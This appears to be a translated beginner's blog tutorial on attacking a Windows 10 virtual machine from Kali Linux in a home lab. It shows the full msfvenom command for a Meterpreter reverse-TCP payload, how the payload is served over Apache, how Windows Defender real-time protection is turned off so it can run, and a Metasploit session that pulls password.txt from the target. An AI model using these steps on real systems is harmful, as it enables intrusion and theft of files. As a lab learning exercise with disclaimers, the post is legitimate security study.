First Windows 10 hack
I want to know the attack method and become a person with high security awareness. Because it's in front of the building, hackers are cool, aren't they? I started practicing hacking with the motive.
It is the 4th day of the Advent calendar of PRO Co., Ltd. It's not about making something, but please forgive me for saying "I wish I had it!" ...
things to do
Build a Windows experimental environment with a VM, and attack and remotely control it from another environment (Kali Linux). It's longer, but there are more images.
* No, absolutely.
This article does not recommend cyber attacks such as unauthorized access. Please do not apply the contents introduced here to the external environment.
prepare
First, build an attack terminal and a target terminal with a VM. This time, it was done in the following environment.
--Host OS: macOS 10.15.2 Beta --Guest OS --Attack terminal: Kali Linux 5.3.0-kali2-amd64 --Target terminal: Windows 10 --Virtualization software: VirtualBox 6.0.14 r133895 (Qt5.6.3)
Building an attack environment
Kali Linux is a Linux distribution used for penetration testing. It is based on Debian and comes pre-installed with over 300 penetration testing tools.
I will use Kali Linux this time, but it is okay to install the attack tool on the OS you are familiar with.
Installing Kali Linux
Download the Kali Linux image from the following page. https://www.kali.org/downloads/ This time, I downloaded "Kali Linux 64-Bit".
In this article, I will omit the detailed installation method.
Building an experimental Windows environment
Download Windows 10 image
Download the Windows 10 ISO file from the following page. https://www.microsoft.com/ja-jp/software-download/windows10ISO
VM creation
Create a virtual machine from a new VirtualBox.
It's done.
Installation & setup
--Start the Windows 10 virtual machine.
--Select the installed ISO file on the "Select Boot Hard Disk" screen.
--Proceed with the initial settings according to the screen.
Click "No product key" on the activation screen.
For the installation type, select "Custom: Install Windows only".
On the authentication screen, click "Offline account" to prevent the motivation file from being synchronized with other Windows devices.
Disable all in the device privacy settings selection.
If the desktop screen is displayed, the setting is complete.
--Remove ISO file from virtual drive
Quit Windows 10 once and open VirtualBox Settings> Storage.
Click the disk icon to the right of the optical drive and select Remove Disk from Virtual Drive.
You're ready to go!
Attack (main story)
This attack experiment will be conducted in the following environment. The attack terminal and the target terminal are in the same network.
| Terminal | IP address |
|---|---|
| Kali Linux (attack terminal) | 10.0.0.2 |
| Windows10 (target terminal) | 10.0.0.102 |
Allow control of the target device from the attacking device
Create a reverse shell in Metasploit Framework and run it on the target device.
What is Metasploit Framework?
It is an open source penetration testing tool that can perform a series of server intrusions such as investigation, intrusion, attack, and backdoor installation / connection. It is provided by default on Kali Linux.
- Please do not use it for an unauthorized external environment as it will result in unauthorized access.
Payload creation
A payload is an executable code that behaves maliciously. This time, we will create a TCP reverse shell payload.
- Reverse shell is a type of shell that connects from the target terminal to the attacking terminal side, aiming at the point that firewalls and routers have relatively loose restrictions on outbound (connection from inside to outside) and communication is hard to be blocked. It is
The following command will create a TCP reverse shell targeting 64-bit windows and specifying the connection destination as the attack terminal (10.0.0.2).
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe
Make the executable file accessible from the outside
The created payload needs to be executed by the target terminal in some way. This time, start Apache so that it can be accessed from the browser of the target terminal.
# mkdir /var/www/html/share
# cp /root/Desktop/evil.exe /var/www/html/share/
# service apache2 restart
Have the target device download the payload
Access http://10.0.0.2/share from the browser on the windows10 side.
I have confirmed that evil.exe exists, so I will download it.
When I clicked evil.exe and chose to run it, it failed because it was detected as a virus by Windows Defender Antivirus.
Clicking on the notification at the bottom right reveals the name Trojan, which I've heard, and I'm a little excited.
When I selected "Allow" from "Operation" and tried to save it again, the display changed.
In this state, click Run to save.
Then turn off "real-time protection" in the Windows Defender Security Center and download again.
Please refer to here (https://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=018503) for the detailed setting method.
This time, the download was successful without any warning.
When you open the folder, you can see that there are two files, one saved when real-time protection is on (evil.exe) and one saved when real-time protection is off (evil (1) .exe).
Wait for the reverse shell on the attacking side
Execute the following command on the attacking terminal and wait for the connection by the reverse shell.
# msfconsole <----input
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v5.0.62-dev ]
+ -- --=[ 1949 exploits - 1090 auxiliary - 334 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5> use exploit / multi / handler <---- input
msf5 exploit (multi / handler)> set payload windows / x64 / meterpreter / reverse_tcp <---- input
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit (multi / handler)> set LHOST 10.0.0.2 <---- input
LHOST=>10.0.0.2
msf5 exploit (multi / handler)> exploit -j -z <---- input
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.0.0.2: 4444 <---- Start listening
msf5 exploit(multi/handler) >
###Run the payload on the target terminal
Execute the payload on the Windows side. The one downloaded when real-time protection is on and the one downloaded when real-time protection is off are executed a total of four times in the pattern of the real-time protection on and off, respectively.
| [When downloading] Real-time protection enabled (evil.exe) |
[When downloading] Real-time protection disabled (evil(1).exe) |
|
|---|---|---|
| 【runtime】 Real-time protection enabled |
Attack failure | Attack failure |
| 【runtime】 Real-time protection disabled |
Attack failure | Successful attack |
All of them give a warning at runtime, but details>Forcibly execute by execution.
Click here for the screen at the time of failure.
If successful, the following will be displayed on the attacking console.
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:49975) at 2019-12-04 09:08:01 +0900
In this state, press Enter and then use the sessions command to display the session list.
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F 10.0.0.2:4444 -> 10.0.0.102:49975 (10.0.0.102)
Attack environment (10.0.0.2) to target environment (10).0.0.The connection to 102) was confirmed.
###Remote control at Meterpreter prompt
Then password for experiment.Create a txt file on the Windows side.
Display the Meterpreter prompt by specifying the session ID on the attacker side.
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
password.Find and download txt.
meterpreter > pwd
C:\Users\arakawa\Downloads
meterpreter > ls
Listing: C:\Users\arakawa\Downloads
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-12-01 21:24:25 +0900 desktop.ini
100777/rwxrwxrwx 7168 fil 2019-12-04 08:21:32 +0900 evil (1).exe
100777/rwxrwxrwx 7168 fil 2019-12-04 09:07:02 +0900 evil.exe
100666/rw-rw-rw- 8 fil 2019-12-04 09:15:30 +0900 password.txt
meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): password.txt -> password.txt
[*] download : password.txt -> password.txt
meterpreter >
Open another terminal and make sure you have downloaded it.
root@kali:~# ls -la password.txt
-rw-r--r-- 1 root root 8 Dec 4 09:15 password.txt
I was able to download it safely (?)! !!
#Summary
I used Kali Linux to attack Windows 10 and conducted remote control experiments. It was surprising that it was easier than I expected. Personally, I think it's a harvest to realize that Windows Defender is doing a good job.
The next step is to create a backdoor, spoof the payload, and much more, so I might write more.
#Reference book